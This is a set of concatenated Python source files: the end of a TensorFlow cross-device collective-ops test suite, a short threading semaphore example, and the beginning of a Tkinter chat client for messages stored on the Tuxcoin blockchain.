destinations=destinations),
_fake_mirrored(mean_2 * len(devices), destinations), sess)
# test batch_reduce()
for d1, d2 in itertools.product(all_destinations, all_destinations):
self._assert_mirrored_equal(
cross_device_ops.batch_reduce(reduce_util.ReduceOp.MEAN,
[(per_replica, d1),
(per_replica_2, d2)]),
[_fake_mirrored(mean, d1),
_fake_mirrored(mean_2, d2)], sess)
self._assert_mirrored_equal(
cross_device_ops.batch_reduce(reduce_util.ReduceOp.SUM,
[(per_replica, d1),
(per_replica_2, d2)]),
[
_fake_mirrored(mean * len(devices), d1),
_fake_mirrored(mean_2 * len(devices), d2)
], sess)
# test broadcast()
for destinations in all_destinations:
self._assert_mirrored_equal(
cross_device_ops.broadcast(constant_op.constant(1.), destinations),
_fake_mirrored(1., destinations), sess)
def _testIndexedSlicesAllReduce(self, devices, cross_device_ops_instance,
reduce_op, batch_reduce):
with self.cached_session() as sess:
dense_shape = [5, 2]
t0 = _make_indexed_slices([[1., 2.]], [1], dense_shape, devices[0])
t1 = _make_indexed_slices([[3., 4.], [5., 6.]], [1, 3], dense_shape,
devices[1])
per_replica = value_lib.PerReplica((t0, t1))
if batch_reduce:
result = cross_device_ops_instance.batch_reduce(
reduce_op, [(per_replica, per_replica)])
else:
result = cross_device_ops_instance.reduce(reduce_op, per_replica,
per_replica)
total_indices_with_dups = [1, 1, 3]
total_indices_without_dups = [1, 3]
if reduce_op == reduce_util.ReduceOp.SUM:
total_values_with_dups = [[1., 2.], [3., 4.], [5., 6.]]
total_values_without_dups = [[4., 6.], [5., 6.]]
else:
assert reduce_op == reduce_util.ReduceOp.MEAN
total_values_with_dups = [[0.5, 1.], [1.5, 2.], [2.5, 3.]]
total_values_without_dups = [[2., 3.], [2.5, 3.]]
total_mirrored_with_dups = _make_mirrored_indexed_slices(
devices, total_values_with_dups, total_indices_with_dups, dense_shape)
total_mirrored_without_dups = _make_mirrored_indexed_slices(
devices, total_values_without_dups, total_indices_without_dups,
dense_shape)
# Test that the result is semantically equal to both the concatenated
# IndexedSlices, as well as when the duplicate indices are summed up.
if batch_reduce:
total_mirrored_with_dups = [total_mirrored_with_dups]
total_mirrored_without_dups = [total_mirrored_without_dups]
self._assert_mirrored_equal(total_mirrored_with_dups, result, sess)
self._assert_mirrored_equal(total_mirrored_without_dups, result, sess)
class SingleWorkerCrossDeviceOpsTest(CrossDeviceOpsTestBase):
reduction_to_one_combinations = combinations.combine(
cross_device_ops=[
combinations.NamedObject("DefaultReductionToOneDevice",
cross_device_ops_lib.ReductionToOneDevice()),
combinations.NamedObject(
"ReductionToCPUDeviceCrossDeviceOps",
cross_device_ops_lib.ReductionToOneDevice(
reduce_to_device=_cpu_device)),
combinations.NamedObject(
"AccumulateNCrossDeviceOp",
cross_device_ops_lib.ReductionToOneDevice(
accumulation_fn=math_ops.add_n)),
],
devices=[
["/cpu:0"],
["/cpu:0", "/gpu:0"],
["/gpu:0", "/gpu:1"],
],
mode=["graph", "eager"])
allreduce_combinations = combinations.combine(
cross_device_ops=[
combinations.NamedObject(
"AllReduce",
cross_device_ops_lib.AllReduceCrossDeviceOps("nccl", 1)),
combinations.NamedObject(
"AllReduceNoGradientRepacking",
cross_device_ops_lib.AllReduceCrossDeviceOps("nccl", 0)),
combinations.NamedObject("NcclAllReduce",
cross_device_ops_lib.NcclAllReduce()),
combinations.NamedObject(
"HierarchicalCopy",
cross_device_ops_lib.HierarchicalCopyAllReduce(8)),
],
devices=[
["/gpu:0", "/gpu:1"],
],
mode=["graph", "eager"])
@combinations.generate(reduction_to_one_combinations + allreduce_combinations)
def testReductionAndBroadcast(self, cross_device_ops, devices):
if isinstance(
cross_device_ops._obj, # pylint: disable=protected-access
cross_device_ops_lib.AllReduceCrossDeviceOps
) and context.executing_eagerly():
self.skipTest("b/149881884")
self._testReductionAndBroadcast(cross_device_ops, devices)
def testChooseAlgorithm(self):
# Not use nccl if there is any cpu device.
self.assertIsInstance(
cross_device_ops_lib.select_cross_device_ops(["/cpu:0"]),
cross_device_ops_lib.ReductionToOneDevice)
# Not use nccl if requested device is not visible to TensorFlow.
# TODO(yuefengz): make `select_cross_device_ops` work with device strings
# self.assertIsInstance(
# cross_device_ops_lib.select_cross_device_ops(["/gpu:100"]),
# cross_device_ops_lib.ReductionToOneDevice)
if context.num_gpus() < 1:
return
devices = ["/gpu:0"]
def mock_get_registered_kernels_for_op(op):
if op == "NcclAllReduce":
return [object]
else:
return []
# Use nccl if nccl kernel is found.
with test.mock.patch.object(kernels, "get_registered_kernels_for_op",
mock_get_registered_kernels_for_op):
self.assertIsInstance(
cross_device_ops_lib.select_cross_device_ops(devices),
cross_device_ops_lib.NcclAllReduce)
# Not use nccl if nccl kernel is not found.
with test.mock.patch.object(kernels,
"get_registered_kernels_for_op", lambda _: []):
self.assertIsInstance(
cross_device_ops_lib.select_cross_device_ops(devices),
cross_device_ops_lib.ReductionToOneDevice)
@combinations.generate(combinations.combine(
mode=["graph", "eager"],
required_gpus=1))
def testSimpleReduceWithIndexedSlices(self):
devices = ["/cpu:0", "/gpu:0"]
t0 = _make_indexed_slices([[1., 2.]], [1], [5, 2], devices[0])
t1 = _make_indexed_slices([[3., 4.], [5., 6.]], [1, 3], [5, 2], devices[1])
per_replica = value_lib.PerReplica((t0, t1))
result = cross_device_ops_lib._simple_reduce(
per_replica, devices[0], math_ops.add_n, reduce_util.ReduceOp.SUM)
# Test that the result is semantically equal to both the concatenated
# IndexedSlices with and without duplicate indices.
total_with_dups = _make_indexed_slices(
[[1., 2.], [3., 4.], [5., 6.]], [1, 1, 3], [5, 2], devices[0])
total_without_dups = _make_indexed_slices(
[[4., 6.], [5., 6.]], [1, 3], [5, 2], devices[0])
self._assert_indexed_slices_equal(total_with_dups, result)
self._assert_indexed_slices_equal(total_without_dups, result)
@combinations.generate(
combinations.combine(
cross_device_ops_instance=[
combinations.NamedObject(
"ReductionToOneDevice",
cross_device_ops_lib.ReductionToOneDevice()),
combinations.NamedObject(
"AllReduceCrossDeviceOps",
cross_device_ops_lib.AllReduceCrossDeviceOps())
],
reduce_op=[reduce_util.ReduceOp.SUM, reduce_util.ReduceOp.MEAN],
batch_reduce=[True, False],
mode=["graph", "eager"],
required_gpus=1))
def testIndexedSlicesAllReduce(self, cross_device_ops_instance, reduce_op,
batch_reduce):
devices = ["/cpu:0", "/gpu:0"]
self._testIndexedSlicesAllReduce(devices, cross_device_ops_instance,
reduce_op, batch_reduce)
@combinations.generate(
combinations.combine(
distribution=strategy_combinations.mirrored_strategy_with_gpu_and_cpu,
cross_device_ops_instance=[
combinations.NamedObject(
"ReductionToOneDevice",
cross_device_ops_lib.ReductionToOneDevice()),
combinations.NamedObject(
"AllReduceCrossDeviceOps",
cross_device_ops_lib.AllReduceCrossDeviceOps("ring"))
],
batch_reduce=[True, False],
mode=["graph", "eager"]))
def testReduceDistributedVariable(self, distribution,
cross_device_ops_instance, batch_reduce):
with distribution.scope():
v = variables.Variable(1.)
if batch_reduce:
result = cross_device_ops_instance.batch_reduce(reduce_util.ReduceOp.MEAN,
[(v, v)])[0]
else:
result = cross_device_ops_instance.reduce(reduce_util.ReduceOp.MEAN, v, v)
for v in result.values:
self.assertIsInstance(v, ops.Tensor)
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual(self.evaluate(result.values), [1.0, 1.0])
NUM_WORKERS = 3
CollectiveCommunication = cross_device_ops_lib.CollectiveCommunication
class CollectiveAllReduceTest(multi_worker_test_base.MultiWorkerTestBase,
CrossDeviceOpsTestBase):
collective_key_base = 100000
@classmethod
def setUpClass(cls):
"""Create a local cluster with 3 workers."""
cls._cluster_spec = multi_worker_test_base.create_in_process_cluster(
num_workers=NUM_WORKERS, num_ps=0)
def setUp(self):
super(CollectiveAllReduceTest, self).setUp()
# Reusing keys is not supported well. So we have to give a different
# collective key base for different tests.
CollectiveAllReduceTest.collective_key_base += 100000
def _get_test_objects(self,
task_type,
task_id,
num_gpus=0,
communication=CollectiveCommunication.AUTO,
use_strategy_object=False,
local_mode=False):
collective_keys = cross_device_utils.CollectiveKeys(
group_key_start=10 + CollectiveAllReduceTest.collective_key_base,
op_instance_key_start=100 + CollectiveAllReduceTest.collective_key_base,
variable_instance_key_start=10000 +
CollectiveAllReduceTest.collective_key_base)
if local_mode:
if num_gpus:
devices = ["/device:GPU:%d" % i for i in range(num_gpus)]
else:
devices = ["/device:CPU:0"]
if use_strategy_object:
strategy = (
collective_all_reduce_strategy.CollectiveAllReduceStrategy
._from_local_devices(devices, communication=communication)) # pylint: disable=protected-access
strategy.extended._collective_keys = collective_keys
strategy.extended._cross_device_ops._collective_keys = collective_keys
strategy.extended._host_cross_device_ops._collective_keys = (
collective_keys)
return strategy, devices, ""
else:
collective_all_reduce_ops = cross_device_ops_lib.CollectiveAllReduce(
devices=devices,
group_size=len(devices),
collective_keys=collective_keys,
communication=communication)
return collective_all_reduce_ops, devices, ""
else:
# NCCL requires physical GPUs for every replica, which we can't do with
# simulated multi host set up now.
assert communication != CollectiveCommunication.NCCL
if num_gpus:
devices = [
"/job:%s/task:%d/replica:0/device:GPU:%d" % (task_type, task_id, i)
for i in range(num_gpus)
]
else:
devices = [
"/job:%s/task:%d/replica:0/device:CPU:0" % (task_type, task_id)
]
if use_strategy_object:
resolver = cluster_resolver.SimpleClusterResolver(
cluster_spec=multi_worker_util.normalize_cluster_spec(
self._cluster_spec),
task_type=task_type,
task_id=task_id,
num_accelerators={"GPU": num_gpus})
strategy = collective_all_reduce_strategy.CollectiveAllReduceStrategy(
cluster_resolver=resolver, communication=communication)
strategy.extended._collective_keys = collective_keys
strategy.extended._cross_device_ops._collective_keys = collective_keys
return (strategy, devices,
"grpc://" + self._cluster_spec[task_type][task_id])
else:
collective_all_reduce_ops = cross_device_ops_lib.CollectiveAllReduce(
devices=devices,
group_size=len(devices) * NUM_WORKERS,
collective_keys=collective_keys,
communication=communication)
return (collective_all_reduce_ops, devices,
"grpc://" + self._cluster_spec[task_type][task_id])
def _assert_mirrored_equal(self, left_list, right_list, sess=None):
if context.executing_eagerly():
run_options = None
else:
# TODO(b/151025792): figure out why missing run options would make the
# test flaky and whether this is a problem in TF 2.
run_options = config_pb2.RunOptions()
run_options.experimental.collective_graph_key = 5
super(CollectiveAllReduceTest, self)._assert_mirrored_equal(
left_list, right_list, sess, run_options=run_options)
def _test_reduction(self,
task_type,
task_id,
num_gpus,
communication,
use_strategy_object=False,
local_mode=False,
hints=None):
collective_all_reduce, devices, master_target = self._get_test_objects(
task_type,
task_id,
num_gpus,
communication=communication,
use_strategy_object=use_strategy_object,
local_mode=local_mode)
if local_mode:
num_workers = 1
worker_device = None
else:
num_workers = len(self._cluster_spec.get("chief", [])) + len(
self._cluster_spec.get("worker", []))
worker_device = "/job:%s/task:%d" % (task_type, task_id)
def _reduce(test_object, reduce_op, per_replica, destinations):
if use_strategy_object:
with test_object.scope():
return test_object.extended.reduce_to(reduce_op, per_replica,
destinations, hints)
else:
return test_object.reduce(reduce_op, per_replica, destinations, hints)
def _batch_reduce(test_object, reduce_op, value_destination_pairs):
if use_strategy_object:
with test_object.scope():
return test_object.extended.batch_reduce_to(reduce_op,
value_destination_pairs,
hints)
else:
return test_object.batch_reduce(reduce_op, value_destination_pairs,
hints)
with ops.Graph().as_default(), \
ops.device(worker_device), \
self.cached_session(target=master_target) as sess:
# Collective ops doesn't support scalar tensors, so we have to construct
# 1-d tensors.
values = [constant_op.constant([float(d)]) for d in range(len(devices))]
per_replica = _make_per_replica(values, devices)
mean = np.array([(len(devices) - 1.) / 2.])
values_2 = [constant_op.constant([d + 1.0]) for d in range(len(devices))]
per_replica_2 = _make_per_replica(values_2, devices)
mean_2 = np.array([mean[0] + 1.])
destination_mirrored = _fake_mirrored(1., devices)
destination_different = _fake_mirrored(1., _cpu_device)
destination_str = _cpu_device
all_destinations = [
destination_different, destination_mirrored, destination_str
]
# test reduce()
for destinations in all_destinations:
self._assert_mirrored_equal(
_reduce(
collective_all_reduce,
reduce_util.ReduceOp.MEAN,
per_replica,
destinations=destinations), _fake_mirrored(mean, destinations),
sess)
self._assert_mirrored_equal(
_reduce(
collective_all_reduce,
reduce_util.ReduceOp.MEAN,
per_replica_2,
destinations=destinations),
_fake_mirrored(mean_2, destinations), sess)
self._assert_mirrored_equal(
_reduce(
collective_all_reduce,
reduce_util.ReduceOp.SUM,
per_replica,
destinations=destinations),
_fake_mirrored(mean * len(devices) * num_workers, destinations),
sess)
self._assert_mirrored_equal(
_reduce(
collective_all_reduce,
reduce_util.ReduceOp.SUM,
per_replica_2,
destinations=destinations),
_fake_mirrored(mean_2 * len(devices) * num_workers, destinations),
sess)
# test batch_reduce()
for d1, d2 in itertools.product(all_destinations, all_destinations):
self._assert_mirrored_equal(
_batch_reduce(collective_all_reduce, reduce_util.ReduceOp.MEAN,
[(per_replica, d1), (per_replica_2, d2)]),
[_fake_mirrored(mean, d1),
_fake_mirrored(mean_2, d2)], sess)
self._assert_mirrored_equal(
_batch_reduce(collective_all_reduce, reduce_util.ReduceOp.SUM,
[(per_replica, d1), (per_replica_2, d2)]),
[
_fake_mirrored(mean * len(devices) * num_workers, d1),
_fake_mirrored(mean_2 * len(devices) * num_workers, d2)
], sess)
def _get_indexed_slices(self,
devices,
start_i,
variable_length,
as_per_replica=True):
dense_shape = [10, 2]
values = ([[1., 2.]], [[3., 4.]], [[2., 1.]], [[0., 0.]], [[3., 1.]],
[[2., 1.]])
indices = ([1], [2], [3], [4], [5], [6])
# values and indices that have variable lengths.
vl_values = ([[1., 2.], [3., 4.]], [[3., 4.]], [[2., 1.]], [[0., 0.]],
[[3., 1.], [2., 1.]], [[2., 1.]])
vl_indices = ([1, 2], [2], [3], [4], [5, 6], [6])
indexed_slices = []
for i, d in enumerate(devices):
idx = i + start_i
indexed_slices.append(
_make_indexed_slices(
vl_values[idx] if variable_length else values[idx],
vl_indices[idx] if variable_length else indices[idx], dense_shape,
d))
if as_per_replica:
per_replica = value_lib.PerReplica(indexed_slices)
return per_replica
else:
return indexed_slices
def _test_reduce_indexed_slices(self,
task_type,
task_id,
num_gpus,
communication,
batch_reduce,
variable_length,
local_mode=False):
collective_all_reduce, devices, master_target = self._get_test_objects(
task_type,
task_id,
num_gpus,
communication=communication,
local_mode=local_mode)
if local_mode:
num_workers = 1
worker_device = None
else:
num_workers = len(self._cluster_spec.get("chief", [])) + len(
self._cluster_spec.get("worker", []))
worker_device = "/job:%s/task:%d" % (task_type, task_id)
with ops.Graph().as_default(), \
ops.device(worker_device), \
self.cached_session(target=master_target) as sess:
per_replica = self._get_indexed_slices(devices,
(task_id or 0) * max(num_gpus, 1),
variable_length)
if batch_reduce:
result = collective_all_reduce.batch_reduce(
reduce_util.ReduceOp.SUM, [(per_replica, per_replica)])[0]
else:
result = collective_all_reduce.reduce(reduce_util.ReduceOp.SUM,
per_replica, per_replica)
if num_gpus > 1:
self.assertIsInstance(result, value_lib.Mirrored)
run_options = config_pb2.RunOptions()
run_options.experimental.collective_graph_key = 7
if num_gpus > 1:
result = sess.run([ops.convert_to_tensor(v) for v in result.values],
options=run_options)[0]
else:
result = sess.run(ops.convert_to_tensor(result), options=run_options)
# Reduce the same indexed slices on CPU locally as our expected results.
devices_cpu = [(worker_device or "") + "/device:CPU:0"] * (
max(num_gpus, 1) * num_workers)
per_replica_on_cpu = self._get_indexed_slices(
devices_cpu, 0, variable_length, as_per_replica=False)
expected_result = cross_device_utils.aggregate_tensors_or_indexed_slices(
per_replica_on_cpu)
expected_result = sess.run(ops.convert_to_tensor(expected_result))
self.assertAllEqual(expected_result, result)
@combinations.generate(
combinations.combine(
mode=["graph"],
required_gpus=[0, 1, 2],
use_strategy_object=[True, False],
bytes_per_pack=[0, 1, 4]))
def testReductionDistributed(self, required_gpus, use_strategy_object,
bytes_per_pack):
hints = collective_util.Hints(bytes_per_pack=bytes_per_pack)
self._run_between_graph_clients(
self._test_reduction,
self._cluster_spec,
required_gpus,
communication=CollectiveCommunication.RING,
use_strategy_object=use_strategy_object,
hints=hints)
@combinations.generate(
combinations.combine(
mode=["graph"],
required_gpus=[0, 1, 2],
variable_length=[True, False]))
def testReduceIndexedSlicesDistributed(self, required_gpus, variable_length):
self._run_between_graph_clients(
self._test_reduce_indexed_slices,
self._cluster_spec,
required_gpus,
communication=CollectiveCommunication.RING,
batch_reduce=True,
variable_length=variable_length)
# Collective ops doesn't support strategy with one device.
@combinations.generate(
combinations.combine(
mode=["graph"],
required_gpus=2,
communication=[
CollectiveCommunication.NCCL, CollectiveCommunication.RING
],
use_strategy_object=[True, False]))
def testReductionLocal(self, required_gpus, communication,
use_strategy_object):
self._test_reduction(
None,
None,
required_gpus,
communication=communication,
use_strategy_object=use_strategy_object,
local_mode=True)
@combinations.generate(
combinations.combine(
mode=["graph"],
required_gpus=2,
batch_reduce=[True, False],
variable_length=[True, False],
communication=[
CollectiveCommunication.NCCL, CollectiveCommunication.RING
]))
def testReduceIndexedSlicesLocal(self, required_gpus, batch_reduce,
variable_length, communication):
self._test_reduce_indexed_slices(
None,
None,
required_gpus,
communication=communication,
batch_reduce=batch_reduce,
variable_length=variable_length,
local_mode=True)
@combinations.generate(
combinations.combine(
required_gpus=2,
mode="eager",
communication=[
CollectiveCommunication.NCCL, CollectiveCommunication.RING
]))
def testEagerMultiThread(self, communication):
collective, devices, _ = self._get_test_objects(
None,
None,
num_gpus=2,
communication=communication,
use_strategy_object=False,
local_mode=True)
# We would like to simulate the following sequence:
# thread-0 device0 device1
# thread-1 device0 device1
# If the kernel launch sequence is as-is the program will deadlock since
# NCCL requires the launch order to be same on each device.
v0 = _make_per_replica([1.0 for _ in devices], devices)
v1 = _make_per_replica([2.0 for _ in devices], devices)
# Add a delay to collective_ops.all_reduce according to the input tensors
# index in `sequence.`
sequence = [v0.values[0], v1.values[0], v1.values[1], v0.values[1]]
all_reduce = collective_ops.all_reduce
def delayed_all_reduce(input_tensor, *args, **kwargs):
for idx, v in enumerate(sequence):
if input_tensor is v:
time.sleep(idx)
break
return all_reduce(input_tensor, *args, **kwargs)
with test.mock.patch.object(collective_ops, "all_reduce",
delayed_all_reduce):
# We only use NCCL for batch reduce with two or more values, so we use two
# values here.
def thread_fn():
reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM, [(v0, v0),
(v0, v0)])
self.assertAllEqual(reduced[0].values, [2.0, 2.0])
self.assertAllEqual(reduced[1].values, [2.0, 2.0])
t = threading.Thread(target=thread_fn)
t.start()
reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM, [(v1, v1),
(v1, v1)])
self.assertAllEqual(reduced[0].values, [4.0, 4.0])
self.assertAllEqual(reduced[1].values, [4.0, 4.0])
t.join()
if __name__ == "__main__":
# Set default inter op thread pool size to one to ensure we don't exhaust the
# thread pool with the additional executors to run collectives in eager.
os.environ["TF_NUM_INTEROP_THREADS"] = "1"
test.main()
|
sema_Resource_Control.py
|
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# sema_signal.py
#
# An example of using a semaphore for signaling between threads
import threading
import requests
import time
sema = threading.Semaphore(2) # Max: 2-threads
URL = 'https://stackoverflow.com'
def fetch_page(url):
sema.acquire()
try:
r = requests.get(url)
print(threading.current_thread(),r.status_code)
finally:
sema.release()
# In this example, only 2 threads can be executing the function at once(If there are more, they will have to wait)
for i in range(10):
t1 = threading.Thread(target=fetch_page,args=(URL,))
t1.start()
|
tuxchat.py
|
# MIT License
# Copyright (c) 2022 bleach86, tuxprint#5176
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from bitcoinrpc.authproxy import AuthServiceProxy, JSONRPCException
import json
from tkinter import *
from tkinter import font, ttk, messagebox
from tooltip import ToolTip
import threading
import time
import re
from pygame import mixer
import pyperclip
import os
from datetime import datetime
import emoji
import names, tcinit
from tkinter.scrolledtext import ScrolledText
import platform
def settings():
with open('settings.json') as f:
settings = json.loads(f.read())
return settings
with open("emote.json", 'r', encoding='utf-8') as e:
emote = json.loads(e.read())
emoteList = emote
rpcproxy2 = AuthServiceProxy(f"http://{settings()['rpcConnection']['username']}:{settings()['rpcConnection']['password']}@{settings()['rpcConnection']['ip']}:{settings()['rpcConnection']['port']}")
version = 'v0.18-alpha'
def rpcproxy():
rpcproxy = AuthServiceProxy(f"http://{settings()['rpcConnection']['username']}:{settings()['rpcConnection']['password']}@{settings()['rpcConnection']['ip']}:{settings()['rpcConnection']['port']}")
return rpcproxy
focus = True
def getNames():
with open('names.json') as f:
screenNames = json.loads(f.read())
return screenNames
def getBlocked():
with open('blocklist.json') as f:
blocked = json.loads(f.read())
return blocked
def getMessages():
global seenTX
global bestBlock
message = []
currentHeight = rpcproxy2.getblockcount() +1
for i in range(bestBlock, currentHeight):
hash = rpcproxy2.getblockhash(i)
block = rpcproxy2.getblock(hash)
for txid in block['tx']:
if txid in seenTX:
seenTX.remove(txid)
continue
tx = rpcproxy2.getrawtransaction(txid, True)
if 'coinbase' in tx['vin'][0]:
#print('coinbase bitches')
continue
for i in tx['vout']:
if 'OP_RETURN' in i['scriptPubKey']['asm']:
#print('message bitches')
msg = i['scriptPubKey']['hex']
msgBytes = bytes.fromhex(msg[8:])
try:
try:
msgString = msgBytes.decode("UTF-8")
except:
try:
msgBytes = bytes.fromhex(msg[10:])
msgString = msgBytes.decode("UTF-8")
except:
msgBytes = bytes.fromhex(msg[12:])
msgString = msgBytes.decode("UTF-8")
msgString = json.loads(msgString)
if msgString['addr'] in getBlocked()['blackList']:
continue
verify = rpcproxy2.verifymessage(msgString['addr'], msgString['sig'], msgString['message'] + str(msgString['time']) + str(msgString['rm']))
if msgString['rm'] == settings()['room'].strip() and verify == True:
msgString['txid'] = txid
message.append(msgString)
print(msgString)
if verify == True:
print("Signature Verified")
else:
print("Signature not verified")
except:
continue
#print(msgBytes)
mempool = rpcproxy2.getrawmempool()
for txid in mempool:
if txid in seenTX:
continue
tx = rpcproxy2.getrawtransaction(txid, True)
for i in tx['vout']:
if 'OP_RETURN' in i['scriptPubKey']['asm']:
#print('message bitches')
msg = i['scriptPubKey']['hex']
msgBytes = bytes.fromhex(msg[8:])
try:
try:
msgString = msgBytes.decode("UTF-8")
except:
try:
msgBytes = bytes.fromhex(msg[10:])
msgString = msgBytes.decode("UTF-8")
except:
msgBytes = bytes.fromhex(msg[12:])
msgString = msgBytes.decode("UTF-8")
msgString = msgBytes.decode("UTF-8")
msgString = json.loads(msgString)
if msgString['addr'] in getBlocked()['blackList']:
continue
verify = rpcproxy2.verifymessage(msgString['addr'], msgString['sig'], msgString['message'] + str(msgString['time']) + str(msgString['rm']))
if msgString['rm'] == settings()['room'].strip() and verify == True:
msgString['txid'] = txid
message.append(msgString)
print(msgString)
if verify == True:
print("Signature Verified")
else:
print("Signature not verified")
except:
continue
#print(msgBytes)
seenTX.append(txid)
bestBlock = currentHeight
return(sorted(message, key=lambda d: d['time']))
def subEmotes(msg):
msg = emoji.emojize(msg, use_aliases=True)
emote = emoteList
if settings()['subEmotes'] == True:
for i in emote:
if i in msg:
msg = msg.replace(i, emote[i])
return msg
def subName(addr, info=False):
if addr in getNames():
if getNames()[addr]['name'] == "":
return addr
elif addr in getBlocked()['hideName'] and info == False:
return addr
else:
return getNames()[addr]['name']
else:
return addr
def subColor(addr):
if addr in getNames():
return getNames()[addr]['color']
else:
return 'white'
class GUI:
# constructor method
def __init__(self):
self.focus = focus
self.lastMsg = 0
with open('settings.json') as f:
settings = json.loads(f.read())
self.settings = settings
if self.settings['mute'] == False:
mixer.init()
ps = mixer.Sound('pop-alert.ogg')
self.ps = ps
self.json = json
self.rpcproxy = rpcproxy
self.masterMsg = []
# chat window which is currently hidden
self.Window = Tk()
self.Window.withdraw()
if self.settings['enterToSend'] == True:
self.Window.bind("<Return>", self.enterbtn)
self.Window.bind("<Shift-Return>", self.shiftenterbtn)
self.Window.bind("<FocusIn>", self.focusIn)
self.Window.bind("<FocusOut>", self.focusOut)
self.Window.bind("<Button-3>", self.rightClick)
self.Window.bind("<Button-1>", self.leftClick)
self.Window.protocol("WM_DELETE_WINDOW", self.onClose)
self.goAhead(subName(self.settings['signingAddress']))
if os.name == 'nt':
self.Window.iconbitmap('tuxchat-logo.ico')
else:
self.Window.call('wm', 'iconphoto', self.Window._w, PhotoImage(file='tuxchat-logo.png'))
self.Window.mainloop()
def goAhead(self, name):
self.layout(name)
# the thread to receive messages
rcv = threading.Thread(target=self.receive)
rcv.start()
# The main layout of the chat
def layout(self,name):
self.name = name
if len(name) > 24:
dots = '...'
else:
dots = ''
# to show chat window
self.Window.deiconify()
self.Window.title(f"Tuxcoin blockchain messaging interface | {version}")
self.Window.resizable(width = False,
height = False)
self.Window.configure(
bg = "#17202A")
self.labelHead = Label(self.Window,
bg = "#17202A",
fg = "#EAECEE",
text = f"{self.name[0:24]}{dots} | {self.settings['room'].strip()}",
font = ("Noto", 13, "bold"),
pady = 5)
self.labelHead.pack(side=TOP)
self.textCons = ScrolledText(self.Window,
bg = "#17202A",
fg = "#EAECEE",
font = ("Noto", 14),
width=50,
padx = 5,
pady = 5,
wrap=WORD)
self.textCons.pack(fill=BOTH, side=TOP, padx=5, pady=5, anchor="w")
self.entryMsg = ScrolledText(self.Window,
width=50,
height=4,
padx=5,
pady=5,
bg = "#2C3E50",
fg = "#EAECEE",
font = ("Noto", 13),
wrap=WORD)
# place the given widget
# into the gui window
self.entryMsg.pack(side=LEFT, anchor="w", padx=5, pady=5)
self.entryMsg.focus()
# create a Send Button
self.buttonMsg = Button(self.Window,
text = "Send",
font = ("Noto", 10, "bold"),
bg = "#17202A",
fg = "#EAECEE",
width=11,
height=1,
bd=0,
command = lambda : self.sendButton(re.sub(r'[\r\n][\r\n]{2,}', '\n\n', self.entryMsg.get(1.0, "end-1c"))))
self.buttonMsg.pack(side=BOTTOM, anchor="w", pady=5)
self.buttonSetting = Button(self.Window,
text = "Settings",
font = ("Noto", 10, "bold"),
width = 10,
height=1,
bg = "#17202A",
fg = "#EAECEE",
bd=0,
command = self.settingsBtn)
self.buttonSetting.pack(side=BOTTOM, anchor="w", pady=5, ipadx=3)
ToolTip(widget = self.buttonSetting, text = "Change tuxchat settings, including screen name, here.")
self.labelFoot = Label(self.Window,
bg = "#17202A",
fg = "#EAECEE",
text = f"Balance: {rpcproxy().getbalance():,}")
self.labelFoot.pack(side=BOTTOM, anchor="w", padx=5)
self.textCons.config(cursor = "arrow")
self.textCons.config(state = DISABLED)
self.rcMenu = Menu(self.Window, tearoff=0)
self.rcMenu.add_command(label ="Cut", command=self.cut)
self.rcMenu.add_command(label ="Copy", command=self.copy)
self.rcMenu.add_command(label ="Paste", command=self.paste)
def updateName(self):
if self.name != subName(settings()['signingAddress']):
self.name = subName(settings()['signingAddress'])
if len(self.name) > 24:
dots = '...'
else:
dots = ''
self.labelHead['text'] = f"{self.name[0:24]}{dots} | {settings()['room'].strip()}"
def updateBalance(self):
tnow = datetime.now()
if tnow.second % 10 == 0:
self.labelFoot['text'] = f"Balance: {rpcproxy().getbalance():,}"
def rightClick(self, event):
try:
self.rcMenu.tk_popup(event.x_root, event.y_root)
finally:
self.rcMenu.grab_release()
def leftClick(self, event):
try:
self.rcMenu.unpost()
except:
pass
def settingsBtn(self):
self.buttonSetting.config(state='disabled')
self.popup = Tk()
self.popup.wm_title("Tuxchat Settings")
self.addrLabel = Label(self.popup, text="Signing Address: ", font=("Noto", 10, "bold"))
self.addrLabel.grid(row=1, column=1, pady=10)
self.addrEntry = Entry(self.popup, width=36)
self.addrEntry.grid(row=1, column=2)
self.addrEntry.insert(END, settings()['signingAddress'])
self.addrBtn = Button(self.popup, text='Submit', command = lambda : self.setAddr(self.addrEntry.get()))
self.addrBtn.grid(row=1, column=5)
self.nameLabel = Label(self.popup, text="Screen Name: ", font=("Noto", 10, "bold"))
self.nameLabel.grid(row=2, column=1, pady=10)
self.nameEntry = Entry(self.popup, width=36)
self.nameEntry.grid(row=2, column=2)
self.nameEntry.insert(END, self.name)
colorChoice = settings()['colors']
selectedChoice = StringVar()
self.colorCombo = ttk.Combobox(self.popup, textvariable=selectedChoice, width=10)
self.colorCombo['values'] = colorChoice
self.colorCombo.current(colorChoice.index(subColor(settings()['signingAddress'])))
self.colorCombo.grid(row=2, column=4, sticky="W")
self.colorLabel = Label(self.popup, text="Color:", font=("Noto", 10, "bold"))
self.colorLabel.grid(row=2, column=3, sticky='W')
self.nameBtn = Button(self.popup, text='Submit', command = lambda : self.setName(self.nameEntry.get(), self.colorCombo.get()))
self.nameBtn.grid(row=2, column=5)
self.roomLabel = Label(self.popup, text="Room: ", font=("Noto", 10, "bold"))
self.roomLabel.grid(row=3, column=1, pady=10)
roomChoice = settings()['roomHistory']
selectedRoomChoice = StringVar()
self.roomCombo = ttk.Combobox(self.popup, textvariable=selectedRoomChoice)
